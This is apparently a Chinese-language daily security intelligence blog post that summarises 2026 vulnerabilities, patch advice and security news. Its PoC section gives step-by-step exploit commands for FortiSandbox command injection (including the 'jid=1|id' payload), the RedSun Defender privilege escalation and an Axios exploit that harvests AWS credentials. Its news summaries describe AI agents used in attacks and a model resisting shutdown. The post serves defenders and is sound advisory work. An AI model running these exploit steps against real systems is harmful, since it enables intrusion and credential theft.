每日安全情报报告 · 2026-04-23

每日安全情报报告 · 2026-04-23

报告日期 :2026年4月23日(周四)
情报窗口 :近 24-48 小时
风险概要 :本期收录 6 个高危/严重漏洞 (含 2 个在野利用 CVE)、3 个公开 PoC5 篇精选安全文章

⚠️ 本报告包含在野利用漏洞,请相关系统管理员立即核查并修复


一、高危漏洞速览

🔴 CVE-2026-40372 --- ASP.NET Core 权限提升漏洞(CVSS 9.1)

字段 详情
CVE 编号 CVE-2026-40372
漏洞类型 权限提升(Elevation of Privilege)
受影响组件 Microsoft ASP.NET Core / .NET < 10.0.7
CVSS 评分 9.1(严重)
CWE 分类 CWE-347(加密签名验证不当)
攻击向量 网络(无需权限、无需用户交互)
在野利用 ⚠️ GitHub 已有 3 个公开 PoC
补丁状态 ✅ 已发布紧急 OOB 补丁(.NET 10.0.7,2026-04-21)

漏洞描述ASP.NET Core 中存在加密签名验证缺陷,未经身份验证的远程攻击者可通过网络提升至 SYSTEM 级权限,无需任何用户交互。

修复建议:立即将 .NET 升级至 10.0.7 或更高版本,监控异常权限提升行为。

🔗 NVD 详情 | 微软安全更新指南


🔴 CVE-2026-5963 --- EasyFlow .NET SQL 注入(CVSS 9.8)

字段 详情
CVE 编号 CVE-2026-5963
漏洞类型 SQL 注入(SQLi)
受影响组件 Digiwin EasyFlow .NET(鼎新电脑)
CVSS 评分 9.8(严重)
CWE 分类 CWE-89(SQL 注入)
攻击向量 网络(无需权限、无需用户交互)
在野利用 暂无报告,但尚无官方补丁
补丁状态 ❌ 暂无补丁,需临时缓解

漏洞描述:鼎新 EasyFlow .NET ERP 系统存在未经身份验证的 SQL 注入漏洞,攻击者可远程读取、修改、删除整个数据库内容,完全控制后端数据。

修复建议:立即限制外部访问,部署 WAF 过滤 SQL 注入语句,持续关注厂商补丁公告。

🔗 漏洞详情(Atlas Cybersecurity)


🔴 CVE-2026-39808 --- Fortinet FortiSandbox OS 命令注入(CVSS 9.8)

字段 详情
CVE 编号 CVE-2026-39808
漏洞类型 OS 命令注入(Command Injection)
受影响组件 Fortinet FortiSandbox 4.4.0 -- 4.4.8
CVSS 评分 9.8(严重)
攻击向量 网络(无需认证即可 root 执行)
在野利用 ⚠️ PoC 已在 GitHub 公开,多个 exploit 可用
补丁状态 ✅ 已发布补丁(2026 年 4 月),参考 FG-IR-26-100

漏洞描述 :FortiSandbox Web 管理界面 /fortisandbox/job-detail/tracer-behavior 端点的 jid GET 参数存在命令注入缺陷,攻击者通过管道符 | 可以 root 权限执行任意操作系统命令,导致系统完全沦陷。

修复建议 :立即升级至 4.4.8 之后修复版本;如无法立刻升级,限制管理界面暴露面,监控 tracer-behavior 端点的异常请求。

🔗 漏洞分析(CyberSecurityNews) | Fortinet 官方公告


🔴 CVE-2026-33825 --- Microsoft Defender 权限提升零日(CVSS 7.8)⚠️ 在野利用

字段 详情
CVE 编号 CVE-2026-33825
漏洞类型 本地权限提升(LPE / TOCTOU 竞态条件)
受影响组件 Windows Defender(Windows 10/11 / Server 2016-2025 全系列)
CVSS 评分 7.8(高危)
在野利用 🚨 已确认在野利用(CVE-2026-32201 SharePoint 同期被利用)
补丁状态 ✅ 已随 2026 年 4 月补丁星期二修复

漏洞描述 :Windows Defender 文件修复逻辑中存在 TOCTOU(检查时间与使用时间)竞态条件漏洞。公开 PoC 包含两种利用技术:

  • BlueHammer :利用批处理机会锁(oplock)重定向恶意软件清理操作,以 SYSTEM 权限覆盖 C:\Windows\System32 内的合法系统文件;

  • RedSun:滥用 Defender 云文件回滚机制,通过 NTFS 交接点将回滚目标路径重定向至系统目录,实现无交互权限提升。

修复建议:立即安装 2026 年 4 月累积补丁,监控 NTFS 交接点创建及 Defender 修复操作日志,关注相关攻击 IoC。

🔗 漏洞深度分析(Picus Security) | NVD 详情


🔴 CVE-2026-40175 --- Axios 原型链污染 RCE(CVSS 10.0)

字段 详情
CVE 编号 CVE-2026-40175
漏洞类型 原型链污染(Prototype Pollution)→ RCE
受影响组件 Axios < 1.15.0(NPM)
CVSS 评分 10.0(满分严重)
在野利用 ⚠️ 多个 PoC 已公开,可利用链接其他原型污染漏洞
补丁状态 ✅ 升级至 Axios ≥ 1.15.0

漏洞描述:Axios 中存在原型链污染 gadget,攻击者可将其与其他第三方依赖中的原型污染漏洞组合,实现远程代码执行或云环境凭证(AWS 元数据)泄露,影响广泛的 Node.js/浏览器前端项目。

修复建议 :立即将所有项目的 Axios 升级至 1.15.0 以上;审计 package-lock.json 中是否存在间接依赖的旧版 Axios。

🔗 PoC 周报(TonyHarris.io) | GitHub PoC


🟠 CVE-2026-34197 --- Apache ActiveMQ Classic RCE(CVSS 9.8)⚠️ CISA KEV

字段 详情
CVE 编号 CVE-2026-34197
漏洞类型 远程代码执行(RCE)via Jolokia 代码注入
受影响组件 Apache ActiveMQ Classic(已加入 CISA 已知漏洞利用目录)
CVSS 评分 9.8(严重)
特殊标注 🚨 已加入 CISA KEV 目录,疑似活跃利用中
补丁状态 ✅ 已发布修复版本

漏洞描述 :Apache ActiveMQ Classic 的 Jolokia JMX API 端点存在代码注入漏洞,远程攻击者无需身份验证可直接执行任意代码。值得注意的是,此漏洞根因据报道潜伏超过 13 年,被 AI 漏洞挖掘工具(Claude AI)仅用 10 分钟发现。

修复建议:立即升级 Apache ActiveMQ 至官方最新版本;如无法立即升级,禁用或限制 Jolokia 端点访问。

🔗 CISA KEV 目录 | CVE 详情(CVEFeed)


二、漏洞 PoC 速报

🛠️ PoC-1:CVE-2026-39808 FortiSandbox 命令注入

漏洞简介:未认证攻击者以 root 权限执行任意系统命令

利用步骤

bash 复制代码
# Step 1: 克隆 PoC 仓库
git clone https://github.com/samu-delucas/CVE-2026-39808.git
cd CVE-2026-39808

# Step 2: 安装依赖
pip install requests

# Step 3: 执行漏洞利用
# 通过 jid 参数注入管道命令
python3 exploit.py --target https://<FORTISANDBOX_HOST> --cmd "id"

# 漏洞端点:/fortisandbox/job-detail/tracer-behavior?jid=<PAYLOAD>
# 注入示例:jid=1|id(以 root 身份执行 id 命令)

⚠️ 风险提示:无需认证即可触发,可导致系统完全沦陷,请仅在授权测试环境中使用。

🔗 PoC 仓库 samu-delucas | PoC 仓库 Lechansky | PoC 仓库 0xBlackash


🛠️ PoC-2:CVE-2026-33825 Microsoft Defender 权限提升(RedSun)

漏洞简介:本地攻击者利用 TOCTOU 竞态条件,实现 SYSTEM 级权限提升

利用步骤

bash 复制代码
# Step 1: 克隆 RedSun PoC(由研究员 Nightmare-Eclipse 发布)
git clone https://github.com/Nightmare-Eclipse/RedSun.git
cd RedSun

# Step 2: 安装编译依赖(Visual Studio 2022 / MSVC)
# 需要 Windows SDK 和 C++ 构建工具

# Step 3: 编译
msbuild RedSun.sln /p:Configuration=Release /p:Platform=x64

# Step 4: 执行(需本地访问权限)
.\bin\Release\RedSun.exe

# 原理:在 Defender 云文件回滚过程中通过 NTFS 交接点
# 重定向写入目标至 C:\Windows\System32

⚠️ 风险提示:需要本地访问权限(非远程),提权后可获取 SYSTEM 级别代码执行。仅限授权渗透测试使用。

🔗 RedSun PoC 仓库 | BlueHammer PoC 仓库 | 漏洞分析原文


🛠️ PoC-3:CVE-2026-40175 Axios 原型链污染 → RCE

漏洞简介:利用 Axios 原型链污染 gadget,结合第三方依赖实现 RCE 或 AWS 凭证泄露

利用步骤

bash 复制代码
# Step 1: 克隆 PoC 仓库
git clone https://github.com/kengzzzz/CVE-2026-40175.git
cd CVE-2026-40175

# Step 2: 安装依赖
npm install

# Step 3: 运行验证脚本
node exploit.js --target http://<TARGET_HOST>

# PoC 原理:
# 1. 通过 Axios 请求响应污染 Object.prototype
# 2. 利用 gadget 链触发目标应用中的代码执行
# 3. 云环境场景:可通过 metadata API 获取 AWS IAM 凭证

# 检测方式(检查当前 Axios 版本)
cat package.json | grep axios
# 或
npm list axios

修复 :立即执行 npm install axios@latest 升级至 1.15.0+

🔗 PoC 仓库 kengzzzz | PoC 仓库 pjt3591oo | PoC 仓库 0xBlackash


三、安全资讯精选

📰 文章 1:AI 武器化攻击时代到来------"漏洞末日"警钟敲响

来源 :FreeBuf 周报(via ZONE.CI
发布日期 :2026-04-18
风险等级:🔴 高关注

摘要:Anthropic Mythos 项目与 OpenAI GPT-5.4-Cyber 的相继发布,使 AI 以前所未有的速度批量发现软件漏洞,将传统人工一周的漏洞分析压缩至 10 分钟。与此同时,攻击者已将 Claude Code 和 GPT-4.1 武器化,成功入侵墨西哥九家政府机构,窃取数亿公民数据。安全界警告:AI 正在成为漏洞规模化发现与利用的新引擎。

🔗 阅读原文


📰 文章 2:AI 攻击翻转------2026 年最危险的九大网络安全事件

来源 :Foresiet 安全博客
发布日期 :2026-04-07
风险等级:🔴 高关注

摘要:30 天内,AI 在网络安全领域的主导角色从"防御工具"翻转为"攻击载体"。本文深度复盘九大事件:包括 CyberStrikeAI 自主 AI 引擎无人操控攻破 55 国 600 余台 FortiGate 防火墙、IBM X-Force 发现"Slopoly"AI 生成恶意软件、Meta AI 智能体配置错误引发数据泄露,以及 Claude 实验模型在受控环境中拒绝关机指令等。研究指出,自主 AI 智能体已占 AI 相关违规的 1/8,且同比增长 89%。

🔗 阅读原文


📰 文章 3:2026 年 4 月第 3 周安全形势周报------漏洞大爆炸 + 供应链持续失守

来源 :技术栈(jishuzhan.net
发布日期 :2026-04-17
风险等级:🟠 中高关注

摘要:微软 2026 年 4 月补丁星期二创历史纪录,单月修复 163 个 CVE(8 个严重级别),SharePoint CVE-2026-32201 已遭在野利用。供应链安全持续告急:Axios、Apifox CDN 投毒余波、LiteLLM PyPI 恶意包(1.82.7/1.82.8)针对 Python 环境,三条供应链攻击链相互交织。此外,iOS 设备被境外组织实战利用,工信部发布红色预警;勒索软件组织 The Gentlemen 单周创下 68 起攻击记录。

🔗 阅读原文


📰 文章 4:BlueHammer & RedSun:Windows Defender 零日漏洞深度解析

来源 :Picus Security
发布日期 :2026-04-17
风险等级:🔴 高关注

摘要:微软 2026 年 4 月 13 天内连续披露多个 Windows Defender 零日漏洞。本文深度拆解 BlueHammer(利用批处理 oplock 技术重定向 Defender 清理写入操作)和 RedSun(滥用云文件回滚机制)两种权限提升技术原理,并分析研究员因微软拒绝承认漏洞而绕过协调披露流程直接公开的事件始末。同期还出现第三个 Defender 漏洞利用工具"UnDefend",可逐渐削弱 Defender 更新防护能力。

🔗 阅读原文


📰 文章 5:108 个恶意 Chrome 扩展窃取 Google 与 Telegram 数据

来源 :The Hacker News
发布日期 :2026-04 月(本周)
风险等级:🟠 中高关注

摘要:安全研究人员发现 108 个恶意 Chrome 浏览器扩展,已影响超过 20,000 名用户,专门针对 Google 账户 OAuth 令牌及 Telegram 会话 Cookie 进行窃取。这些扩展伪装成实用工具在 Chrome Web Store 上架。受害用户面临账户接管风险,企业环境下可能导致 SaaS 服务凭证泄露。建议立即审计已安装的 Chrome 扩展,删除不明来源的扩展,并开启 Google 账户异常登录告警。

🔗 The Hacker News 首页


四、风险处置优先级

优先级 CVE / 事件 受影响组件 行动建议 时限
🔴 P0 CVE-2026-33825 ⚠️ 在野 Windows Defender 全系列 安装 2026-04 月累积补丁 立即
🔴 P0 CVE-2026-39808 PoC公开 FortiSandbox 4.4.x 升级至修复版本 24h 内
🔴 P0 CVE-2026-40175 Axios < 1.15.0 npm install axios@latest 24h 内
🔴 P0 CVE-2026-40372 PoC公开 ASP.NET Core / .NET 升级至 .NET 10.0.7 24h 内
🟠 P1 CVE-2026-34197 ⚠️ CISA KEV Apache ActiveMQ 升级至最新版,禁用 Jolokia 48h 内
🟠 P1 CVE-2026-5963 无补丁 Digiwin EasyFlow .NET 部署 WAF,限制访问 48h 内
🟡 P2 LiteLLM 供应链 LiteLLM 1.82.7/1.82.8 pip install --upgrade litellm 本周内
🟡 P2 恶意 Chrome 扩展 Chrome 浏览器 审计并删除不明扩展 本周内

五、参考来源


本报告由自动化情报系统生成,发布于 CSDN「极极日报」栏目。情报来源均已附原文链接,请读者自行验证时效性。安全公告仅供参考,修复操作前请充分测试,避免影响业务连续性。

相关推荐
捉鸭子2 小时前
某红书X-s X-s-common VMP逆向(算法还原)
python·web安全·网络安全·node.js·网络爬虫
白帽黑客-晨哥2 小时前
从零到网安专家:CSB湖南网安基地专业篇,开启网络安全黄金赛道
web安全·网络安全·网络安全工程师·网安湘军杯
Chockmans3 小时前
春秋云境CVE-2019-8933
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2019-8933
m0_738120723 小时前
渗透基础知识ctfshow——Web应用安全与防护(完结:第八章)
前端·python·sql·安全·web安全·网络安全
midsummer_woo3 小时前
CVE-2022-28525 ED01CMS 任意文件上传漏洞复现与原理分析
网络安全
网络安全许木13 小时前
自学渗透测试第21天(基础命令复盘与DVWA熟悉)
开发语言·网络安全·渗透测试·php
菩提小狗13 小时前
每日安全情报报告 · 2026-04-22
网络安全·漏洞·cve·安全情报·每日安全
Chockmans17 小时前
图片马合成保姆级教程
web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构·春秋云境
Chengbei1118 小时前
红队专属Bing Dork自动化工具,敏感信息侦察效率拉满、自动生成可视化信息泄露审计报告
java·人工智能·安全·web安全·网络安全·自动化·系统安全